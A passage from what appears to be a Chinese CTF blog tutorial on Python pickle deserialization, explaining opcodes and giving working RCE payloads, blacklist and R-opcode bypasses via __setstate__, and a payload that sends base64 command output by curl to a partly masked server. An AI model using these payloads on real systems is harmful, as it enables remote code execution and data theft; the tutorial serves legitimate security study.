<td>使用栈中的第一个元素（储存多个属性名: 属性值的字典）对第二个元素（对象实例）进行属性设置</td>
<td>b</td>
<td>栈上第一个元素出栈</td>
</tr>
<tr>
<td>s</td>
<td>将栈的第一个和第二个对象作为key-value对，添加或更新到栈的第三个对象（必须为列表或字典，列表以数字作为key）中</td>
<td>s</td>
<td>第一、二个元素出栈，第三个元素（列表或字典）添加新值或被更新</td>
</tr>
<tr>
<td>u</td>
<td>寻找栈中的上一个MARK，组合之间的数据（数据必须有偶数个，即呈key-value对）并全部添加或更新到该MARK之前的一个元素（必须为字典）中</td>
<td>u</td>
<td>MARK标记以及被组合的数据出栈，字典被更新</td>
</tr>
<tr>
<td>a</td>
<td>将栈的第一个元素append到第二个元素(列表)中</td>
<td>a</td>
<td>栈顶元素出栈，第二个元素（列表）被更新</td>
</tr>
<tr>
<td>e</td>
<td>寻找栈中的上一个MARK，组合之间的数据并extends到该MARK之前的一个元素（必须为列表）中</td>
<td>e</td>
<td>MARK标记以及被组合的数据出栈，列表被更新</td>
</tr>
</tbody>
</table>
<p>来个实例</p>
<p>而这些指令集就是组成opcode的关键</p>
<p>比如下面这段示例代码</p>
<pre><code class="highlight python"><span class="keyword">import</span> os
os.system(<span class="string">&#x27;ls&#x27;</span>)</code></pre>
<p>用opcode表示可以这样表示</p>
<pre><code class="highlight plaintext">cos 
system #引入os.sysytem,压入栈
(S&#x27;ls&#x27; #压入一个MARK，再压入字符串ls
tR. #t把最后一个MARK处的元素包装成元组入栈
#R把元组作为os.system的参数，最后.运行</code></pre>
<p>这边给两个工具帮助我们调试</p>
<h3 id="pickletools"><a class="markdownIt-Anchor" href="#pickletools"></a> <strong>pickletools</strong></h3>
<p>pickletools是python自带的pickle调试器，有三个功能：反汇编一个已经被打包的字符串、优化一个已经被打包的字符串、返回一个迭代器来供程序使用。我们一般使用前两种</p>
<p>还是用上面那个代码，但是最后一行加一个<code>pickletools.dis(pickle.dumps(x))</code></p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513145648001.png" alt="image-20250513145648001"></p>
<p>简单易懂对吧</p>
<p>但是实际上这种写法是还可以再简化的，因为我们实际上可以**把不必要的<code>PUT</code>指令给删除掉。**这个<code>PUT</code>意思是把当前栈的栈顶复制一份，放进储存区——很明显，我们这个class并不需要这个操作，可以省略掉这些<code>PUT</code>指令。</p>
<p>使用<code>pickletools.optimize</code>来简化，删去不需要的BINPUT操作</p>
<pre><code class="highlight python"><span class="keyword">import</span> pickle
<span class="keyword">import</span> pickletools
<span class="keyword">class</span> <span class="title class_">myday</span>():
	<span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):
		<span class="variable language_">self</span>.task=<span class="string">&#x27;ctf&#x27;</span>
		<span class="variable language_">self</span>.sloves=<span class="number">114514</span>
x=myday()
<span class="built_in">print</span>(pickle.dumps(x))
y=pickletools.optimize(pickle.dumps(x))
pickletools.dis(y)</code></pre>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513150109996.png" alt="image-20250513150109996"></p>
<p>可以看到，确实简化了不少</p>
<p>PS: 使用<code>pickletools.dis</code>分析一个字符串时，如果<code>.</code>执行完毕之后栈里面还有东西，会抛出一个错误；而<code>pickle.loads</code>没有这么严格的检查——它会正常结束。大家应该都知道反序列化字符串的拼接吧。（不知道可以去看看BUUCTF的piapiapia这道题）。通过这种方式我们就有可能实现反序列化字符串的拼接。</p>
<h2 id="反序列化漏洞"><a class="markdownIt-Anchor" href="#反序列化漏洞"></a> 反序列化漏洞</h2>
<h3 id="万恶之源__reduce__方法"><a class="markdownIt-Anchor" href="#万恶之源__reduce__方法"></a> 万恶之源–<code>__reduce__</code>方法</h3>
<p><code>__reduce__</code>对应的指令码即为R</p>
<p>它的作用如下</p>
<pre><code class="highlight plaintext">取当前栈的栈顶记为args，然后把它弹掉。
取当前栈的栈顶记为f，然后把它弹掉。
以args为参数，执行函数f，把结果压进当前栈。</code></pre>
<p>class的<code>__reduce__</code>方法，在pickle反序列化的时候会被执行。其底层的编码方法，就是利用了<code>R</code>指令码。 <code>f</code>要么返回字符串，要么返回一个tuple，后者对我们而言更有用。</p>
<p>一种很流行的攻击思路是：利用 <code>__reduce__</code> 构造恶意字符串，当这个字符串被反序列化的时候，<code>__reduce__</code>会被执行。网上已经有海量的文章谈论这种方法，所以我们在这里不过多讨论。只给出一个例子：正常的字符串反序列化后，得到一个<code>Student</code>对象。我们想构造一个字符串，它在反序列化的时候，执行<code>ls /</code>指令</p>
<p>并且只要你的序列化结果中有这个R，恶意构造就不可避免</p>
<p>要是拿PHP来类比的话，其实就和_wakeup一样，是整个反序列化某种意义上的出口</p>
<p>那我问你，那我问你，我把R禁掉了怎么办</p>
<h3 id="waf"><a class="markdownIt-Anchor" href="#waf"></a> WAF</h3>
<h4 id="绕过函数黑名单"><a class="markdownIt-Anchor" href="#绕过函数黑名单"></a> 绕过函数黑名单</h4>
<p>有一种过滤方式：不禁止<code>R</code>指令码，但是对<code>R</code>执行的函数有黑名单限制。典型的例子是2018-XCTF-HITB-WEB : Python’s-Revenge。给了好长好长一串黑名单：</p>
<pre><code class="highlight text">black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]</code></pre>
<p>可惜<code>platform.popen()</code>不在名单里，它可以做到类似<code>system</code>的功能。这题死于黑名单有漏网之鱼。</p>
<p>另外，还有一个解（估计是出题人的预期解），那就是利用map来干这件事：</p>
<pre><code class="highlight text">class Exploit(object):
    def __reduce__(self):
 	return map,(os.system,[&quot;ls&quot;])</code></pre>
<p>总之，黑名单不可取。要禁止reduce这一套方法，最稳妥的方式是禁止掉<code>R</code>这个指令码。</p>
<h4 id="全局变量包含c指令码的妙用"><a class="markdownIt-Anchor" href="#全局变量包含c指令码的妙用"></a> 全局变量包含：<code>c</code>指令码的妙用</h4>
<p>有这么一道题，彻底过滤了<code>R</code>指令码（写法是：只要见到payload里面有<code>R</code>这个字符，就直接驳回，简单粗暴）。现在的任务是：给出一个字符串，<strong>反序列化之后，name和grade需要与blue这个module里面的name、grade相对应</strong>。</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-b42656fa4b3c95eaee8c37dccacad636_1440w.jpg" alt="img"></p>
<p>目标是取得well done</p>
<p>不能用<code>R</code>指令码了，不过没关系。还记得我们的<code>c</code>指令码吗？它专门用来获取一个全局变量。我们先弄一个正常的Student来看看序列化之后的效果：</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-8b0cb8c071dadcde37abdce434a8f180_1440w.jpg" alt="img"></p>
<p>如何用<code>c</code>指令来换掉这两个字符串呢？以name的为例，只需要把硬编码的<code>rxz</code>改成从<code>blue</code>引入的<code>name</code>，写成指令就是：<code>cblue\nname\n</code>。把用于编码<code>rxz</code>的<code>X\x03\x00\x00\x00rxz</code>替换成我们的这个global指令，来看看改造之后的效果：</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-2a5604887f01ef88aebf6409279e82a1_1440w.jpg" alt="img"></p>
<p>load一下，发现真的引入了blue里面的变量</p>
<p>把这个payload进行base64编码之后传进题目，得到well done。</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-d02aeb43085db59a6d4b41f88c5ea68e_1440w.jpg" alt="img"></p>
<p>顺带一提，由于pickle导出的字符串里面有很多的不可见字符，所以一般都经过base64编码之后传输。</p>
<h4 id="绕过c指令module限制先读入再篡改"><a class="markdownIt-Anchor" href="#绕过c指令module限制先读入再篡改"></a> 绕过<code>c</code>指令<code>module</code>限制：先读入，再篡改</h4>
<p>之前提到过，<code>c</code>指令（也就是GLOBAL指令）基于<code>find_class</code>这个方法， 然而<code>find_class</code>可以被出题人重写。如果出题人只允许<code>c</code>指令包含<code>__main__</code>这一个module，这道题又该如何解决呢？</p>
<p>通过GLOBAL指令引入的变量，可以看作是原变量的引用。我们在栈上修改它的值，会导致原变量也被修改！</p>
<p>有了这个知识作为前提，我们可以干这么一件事：</p>
<ul>
<li>通过<code>__main__.blue</code>引入这一个module，由于命名空间还在main内，故不会被拦截</li>
<li>把一个dict压进栈，内容是<code>&#123;'name': 'rua', 'grade': 'www'&#125;</code></li>
<li>执行BUILD指令，会导致改写 <code>__main__.blue.name</code>和 <code>__main__.blue.grade</code> ，至此<code>blue.name</code>和<code>blue.grade</code>已经被篡改成我们想要的内容</li>
<li>弹掉栈顶，现在栈变成空的</li>
<li>照抄正常的Student序列化之后的字符串，压入一个正常的Student对象，name和grade分别是’rua’和’www’</li>
</ul>
<p>由于栈顶是正常的Student对象，pickle.loads将会正常返回。到手的Student对象，<a target="_blank" rel="noopener" href="http://xn--namegradeblue-450uj96een3bdt1d9sxg.name">当然name和grade都与blue.name</a>、blue.grade对应了——我们刚刚亲手把blue篡改掉。</p>
<pre><code class="highlight text">payload = b&#x27;\x80\x03c__main__\nblue\n&#125;(Vname\nVrua\nVgrade\nVwww\nub0c__main__\nStudent\n)\x81&#125;(X\x04\x00\x00\x00nameX\x03\x00\x00\x00ruaX\x05\x00\x00\x00gradeX\x03\x00\x00\x00wwwub.&#x27;</code></pre>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-be0b611551c62614ea92f06ffe234480_1440w.jpg" alt="img"></p>
<p>绿框区域完成了篡改</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-5d923ca1b18273daec2e8131b64b8721_1440w.jpg" alt="img"></p>
<p>题目返回了well done，而且此时blue.grade已经变成www，可见我们真的篡改了blue.</p>
<p>所以思路就是用现成的白名单来进行RCE</p>
<h4 id="不用reduce也能rce"><a class="markdownIt-Anchor" href="#不用reduce也能rce"></a> 不用reduce，也能RCE</h4>
<p>之前谈到过，<code>__reduce__</code>与<code>R</code>指令是绑定的，禁止了<code>R</code>指令就禁止了<code>__reduce__</code> 方法。那么，在禁止<code>R</code>指令的情况下，我们还能RCE吗？这就是本文研究的重点。</p>
<p>现在的目标是，利用指令码，构造出任意命令执行。那么我们需要找到一个函数调用<code>fun(arg)</code>，其中<code>fun</code>和<code>arg</code>都必须可控。</p>
<p>审pickle源码，来看看BUILD指令（指令码为<code>b</code>）是如何工作的：</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-ae7ce8d82f16d90bda791e4bc5e06f1d_1440w.jpg" alt="img"></p>
<p>BUILD指令实现</p>
<p>这里的实现方式也就是上文的注所提到的：如果<code>inst</code>拥有<code>__setstate__</code>方法，则把<code>state</code>交给<code>__setstate__</code>方法来处理；否则的话，直接把<code>state</code>这个<code>dist</code>的内容，合并到<code>inst.__dict__ </code>里面。</p>
<p>它有什么安全隐患呢？我们来想想看：<code>Student</code>原先是没有<code>__setstate__</code>这个方法的。那么我们利用<code>&#123;'__setstate__': os.system&#125;</code>来BUILE这个对象，那么现在对象的<code>__setstate__</code>就变成了<code>os.system</code>；接下来利用<code>&quot;ls /&quot;</code>来再次BUILD这个对象，则会执行<code>setstate(&quot;ls /&quot;)</code> ，而此时<code>__setstate__</code>已经被我们设置为<code>os.system</code>，因此实现了RCE.</p>
<p>payload构造如下：</p>
<pre><code class="highlight text">payload = b&#x27;\x80\x03c__main__\nStudent\n)\x81&#125;(V__setstate__\ncos\nsystem\nubVls /\nb.&#x27;</code></pre>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-5f6f6661a916b296e3fac6fbed8427cc_1440w.jpg" alt="img"></p>
<p>执行结果：</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-44a237be1ffe80cf2969d217831fe5dd_1440w.jpg" alt="img"></p>
<p>成功RCE！接下来可以通过反弹shell来控制靶机了。</p>
<p>有一个可以改进的地方：这份payload由于没有返回一个Student，导致后面抛出异常。要让后面无异常也很简单：干完了恶意代码之后把栈弹到空，然后压一个正常Student进栈。payload构造如下：</p>
<pre><code class="highlight text">payload = b&#x27;\x80\x03c__main__\nStudent\n)\x81&#125;(V__setstate__\ncos\nsystem\nubVls /\nb0c__main__\nStudent\n)\x81&#125;(X\x04\x00\x00\x00nameX\x03\x00\x00\x00ruaX\x05\x00\x00\x00gradeX\x03\x00\x00\x00wwwub.&#x27;</code></pre>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-fd188e8d3e3f341d719019b7e869bf9d_1440w.jpg" alt="img"></p>
<p>绿色框内为恶意代码</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-d5b6e15f6b0506689952cf0e8f93691f_1440w.jpg" alt="img"></p>
<p>没有抛出异常。</p>
<p><strong>至此，我们完成了不使用<code>R</code>指令、无副作用的RCE。</strong></p>
<p>除此之外，其实我们还是可以通过一些其他类似的漏洞方法来打rce</p>
<pre><code class="highlight python">__reduce_ex__()
__setstate__()</code></pre>
<p>实例</p>
<pre><code class="highlight plaintext">#__setstate__:
import pickle
import pickletools
import os
class obj:
   def __init__(self,str1,str2):
      self.str1=str1;
      self.str2=str2;
   def __setstate__(self,name):
        os.system(&#x27;dir&#x27;)
#    def __reduce__(self):
#       return(os.system,(&#x27;dir&#x27;,))
class1=obj(&quot;str1&quot;,&quot;str2&quot;)
a=pickle.dumps(class1)      
print(a)
b=a
pickle.loads(b)

#setstate
</code></pre>
<h4 id="一些细节"><a class="markdownIt-Anchor" href="#一些细节"></a> 一些细节</h4>
<p><strong>一</strong>、**其他模块的load也可以触发pickle反序列化漏洞。**例如：<code>numpy.load()</code>先尝试以numpy自己的数据格式导入；如果失败，则尝试以pickle的格式导入。因此<code>numpy.load()</code>也可以触发pickle反序列化漏洞。</p>
<p>二、即使代码中没有<code>import os</code>，<strong>GLOBAL指令也可以自动导入<code>os.system</code></strong>。因此，不能认为“我不在代码里面导入os库，pickle反序列化的时候就不能执行os.system”。</p>
<p>三、**即使没有回显，也可以很方便地调试恶意代码。**只需要拥有一台公网服务器，执行<code>os.system('curl your_server/</code>ls / | base64<code>)</code>，然后查询您自己的服务器日志，就能看到结果。这是因为：以```引号包含的代码，在sh中会直接执行，返回其结果。</p>
<p>下面给出一个例子：</p>
<pre><code class="highlight text">payload  = b&#x27;\x80\x03c__main__\nStudent\n)\x81&#125;(V__setstate__\ncos\nsystem\nubVcurl 47.***.***.105/`ls / | base64`\nb.&#x27;</code></pre>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-f60a5ad59d548b1ca78b839320318dfe_1440w.jpg" alt="img"></p>
<p>payload</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-377763e71f5d198566d7b40e418289f8_1440w.jpg" alt="img"></p>
<p>pickle.loads()效果</p>
<p><img src="/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-0c450bc39b3ce69cdf14486ed14752c1_1440w.jpg" alt="img"></p>
<p><code>pickle.loads()</code>时，<code>ls /</code>的结果被base64编码后发送给服务器（红框）；我们的服务器查看日志，就可以得到命令执行结果。因此，在没有回显的时候，我们可以通过<code>curl</code>把执行结果送到我们的服务器上。</p>
<p>上文发出去的请求缺了一段，是因为url没有加引号。</p>
<p>GLOBAL操作符</p>
<pre><code class="highlight plaintext">GLOBAL操作符读取全局变量，是使用的find_class函数。而find_class对于不同的协议版本实现也不一样。总之，它干的事情是“去x模块找到y”，y必须在x的顶层（也即，y不能在嵌套的内层）</code></pre>
<h3 id="手搓opcode"><a class="markdownIt-Anchor" href="#手搓opcode"></a> 手搓opcode</h3>
<p>只要会自己写opcode事情就简单多了。把。</p>
<ol>
<li>o指令绕过</li>
</ol>
<pre><code class="highlight plaintext">payload1 = b&#x27;&#x27;&#x27;(cos
system
S&#x27;cat /f* &gt; /tmp/a&#x27;
o.&#x27;&#x27;&#x27;</code></pre>
<blockquote>
<p>先是用 ( 入栈一个MARK，然后用 c 导入os.system()函数入栈，然后用 S 定义字符串并入栈，最后用 o **寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数，*<em>结果是os.system(cat /f</em> &gt; /tmp/a’o)， 点号是结束的意思</p>
</blockquote>
<ol start="2">
<li>b指令绕过</li>
</ol>
<pre><code class="highlight plaintext">payload2 =(c__main__
User
o&#125;(S&quot;\x5f\x5f\x73\x65\x74\x73\x74\x61\x74\x65\x5f\x5f&quot; //__setstate__
cos
system
ubS&quot;cat /ffl14aaaaaaagg&gt;/tmp/gkjzjh146&quot;
b.</code></pre>
<p>3.s指令绕过</p>
<p>如果<code>'</code>或者<code>&quot;</code>被ban了的话怎么办捏，可以用V来代替</p>
<pre><code class="highlight plaintext">S&#x27;ls&#x27;
和
Vls
是一样的效果</code></pre>
<p>4.i一把梭</p>
<pre><code class="highlight python"><span class="keyword">import</span> pickle
opcode=<span class="string">b&#x27;&#x27;&#x27;(Vls</span>
<span class="string">ios</span>
<span class="string">system</span>
<span class="string">.&#x27;&#x27;&#x27;</span>
pickle.loads(opcode)</code></pre>
<p>直接代替了c和o的功能</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.jpg" alt="AyaN0 微信">
        <span>微信</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/Web/" rel="tag"># -Web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/05/08/%E4%B8%80%E4%B8%AA%E9%A3%9E%E8%88%9E%E7%9A%84%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%AE%9E%E5%BD%95/" rel="prev" title="一个飞舞的渗透学习实录">
                  <i class="fa fa-angle-left"></i> 一个飞舞的渗透学习实录
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/06/22/2025%E5%B9%B4%E4%B8%AD%E6%80%BB%E7%BB%93/" rel="next" title="2025年中总结">
                  2025年中总结 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">AyaN0</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">314k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">9:31</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
